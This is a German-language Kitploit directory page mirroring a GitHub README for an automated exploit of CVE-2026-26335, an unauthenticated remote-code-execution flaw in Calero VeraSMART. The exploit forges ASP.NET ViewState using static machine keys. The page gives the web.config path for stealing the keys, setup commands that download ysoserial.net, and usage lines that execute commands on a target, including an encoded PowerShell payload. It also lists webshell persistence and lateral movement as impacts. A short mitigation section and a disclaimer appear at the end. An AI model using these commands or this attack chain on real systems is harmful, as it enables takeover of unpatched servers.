Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-26335-Calero-VeraSMART-RCE — Automatisierter Exploit für CVE-2026-26335, eine kritische, nicht authentifizierte RCE in Calero VeraSMART über gefälschte ASP.NET ViewState unter Verwendung statischer Maschinenschlüssel. Enthält Endpunkt-Erkennung, Payload-Erzeugung und Befehlsausführung. | Kitploit
Tools/GitHubGitHub/mbanyamer/cve-2026-26335-calero-verasmart-rce
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsRed Teaming
GitHubmbanyamer/cve-2026-26335-calero-verasmart-rce

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

CVE-2026-26335-Calero-VeraSMART-RCE

Automatisierter Exploit für CVE-2026-26335, eine kritische, nicht authentifizierte RCE in Calero VeraSMART über gefälschte ASP.NET ViewState unter Verwendung statischer Maschinenschlüssel. Enthält Endpunkt-Erkennung, Payload-Erzeugung und Befehlsausführung.

Repository anzeigen
1vor 6 MonatenNoch nicht geprüft
Teilen

👤 Autor

Mohammed Idrees Banyamer Sicherheitsforscher

  • GitHub: https://github.com/mbanyamer
  • Instagram: https://instagram.com/banyamer_security

CVE-2026-26335 - Calero VeraSMART ViewState RCE Exploit

CVE Severity CVSS Platform ASP.NET Python License Author


📌 Beschreibung

CVE‑2026‑26335 ist eine kritische, nicht authentifizierte Remote-Code-Ausführungs-Schwachstelle in Calero VeraSMART (vor 2022 R1).

Die Anwendung verwendet statische, hartkodierte ASP.NET-Machine-Keys, die installationsübergreifend gemeinsam genutzt werden.
Ein Angreifer mit diesen Keys kann einen bösartigen ASP.NET-ViewState fälschen und serverseitige Deserialisierung → RCE auslösen.

Dieser Exploit automatisiert:

  • Erkennung des ViewState-Endpunkts
  • Extraktion von __VIEWSTATEGENERATOR
  • Generierung der ysoserial-Payload
  • Zustellung des signierten ViewState
  • Befehlsausführung

⚠️ Auswirkungen

  • Nicht authentifizierte RCE
  • Kompromittierung des IIS-Benutzers
  • Laterale Bewegung in der Domäne
  • Datenerfassung
  • Persistenz über Webshell

🧠 Grundursache

CWE‑321 — Hartkodierte kryptografische Schlüssel

VeraSMART-Bereitstellungen verwenden denselben ASP.NET-machineKey erneut:

root@kitploit:~
<machineKey validationKey="STATIC_KEY"
           decryptionKey="STATIC_KEY"
           validation="SHA1"
           decryption="AES" />

Jeder Angreifer mit Keys aus einer Installation kann alle angreifen.


🛠 Anforderungen

  • Python 3
  • ysoserial.net
  • VeraSMART-Machine-Keys
  • Netzwerkzugriff auf IIS

⚙️ Installation

root@kitploit:~
git clone https://github.com/mbanyamer/CVE-2026-26335-VeraSMART-RCE.git
cd CVE-2026-26335-VeraSMART-RCE
wget https://github.com/pwntester/ysoserial.net/releases/latest/download/ysoserial.exe

🔑 Beschaffung der Machine-Keys

Die Keys sind nicht öffentlich. Vom Zielsystem abrufen:

root@kitploit:~
C:\Program Files (x86)\Veramark\VeraSMART\WebRoot\web.config

Oder über begleitendes Datei-Lesen:

CVE‑2026‑26333


🚀 Verwendung

Schwachstelle prüfen

root@kitploit:~
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY --check-only -v

Befehl ausführen

root@kitploit:~
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY -c "whoami"

Spezifischer Endpunkt

root@kitploit:~
python3 exploit.py -t https://target-ip -vk KEY -dk KEY -e /Login.aspx -c "powershell -enc ZQBjAGgAbwAgAEgAYQBjAGsAZQBkAA=="

Proxy-Debugging

root@kitploit:~
python3 exploit.py -t https://target-ip -vk KEY -dk KEY --proxy http://127.0.0.1:8080 -v

📡 Exploit-Ablauf

  1. ViewState-Endpunkt finden
  2. Generator extrahieren
  3. Signierte Payload generieren
  4. Gefälschten ViewState senden
  5. ASP.NET-Deserialisierung
  6. Befehlsausführung

📊 CVSS

9.8 — Kritisch AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


🧪 Getestet auf

  • VeraSMART 2020
  • VeraSMART 2021
  • VeraSMART 2022 (vor R1)
  • Windows Server 2016/2019
  • IIS 10
  • ASP.NET 4.x

🔒 Gegenmaßnahmen

Behoben in VeraSMART 2022 R1:

  • Einzigartige Machine-Keys
  • ViewState-Härtung
  • Sichere Schlüsselspeicherung

Workarounds:

  • machineKey rotieren
  • ViewState deaktivieren
  • IIS-Exposition einschränken
  • WAF-ViewState-Regeln

📚 Referenzen

  • https://www.vulncheck.com/advisories/calero-verasmart-2022-r1-static-iis-machine-keys-enable-viewstate-rce
  • https://www.calero.com/

⚖️ Haftungsausschluss

Nur für Bildungszwecke und autorisierte Tests. Nur auf Systemen verwenden, die Ihnen gehören oder für die Sie eine Prüferlaubnis haben.


👤 Autor

Mohammed Idrees Banyamer Sicherheitsforscher

  • GitHub: https://github.com/mbanyamer
  • Instagram: https://instagram.com/banyamer_security

📊 Exploit-Diagramm

Das folgende Diagramm veranschaulicht die Exploit-Kette von CVE‑2026‑26335 in Calero VeraSMART, bei der statische ASP.NET-Machine-Keys das Fälschen eines bösartigen ViewState ermöglichen, was zu Remote-Code-Ausführung führt.

root@kitploit:~
flowchart LR
    A[Attacker] --> B[Obtain VeraSMART machineKey]
    B --> C[Discover ViewState endpoint]
    C --> D[Extract __VIEWSTATEGENERATOR]
    D --> E[Generate malicious ViewState via ysoserial]
    E --> F[Sign payload with machineKey]
    F --> G[Send forged POST request]
    G --> H[ASP.NET ViewState deserialization]
    H --> I[TypeConfuseDelegate gadget]
    I --> J[Remote Code Execution on IIS]
Tool herunterladen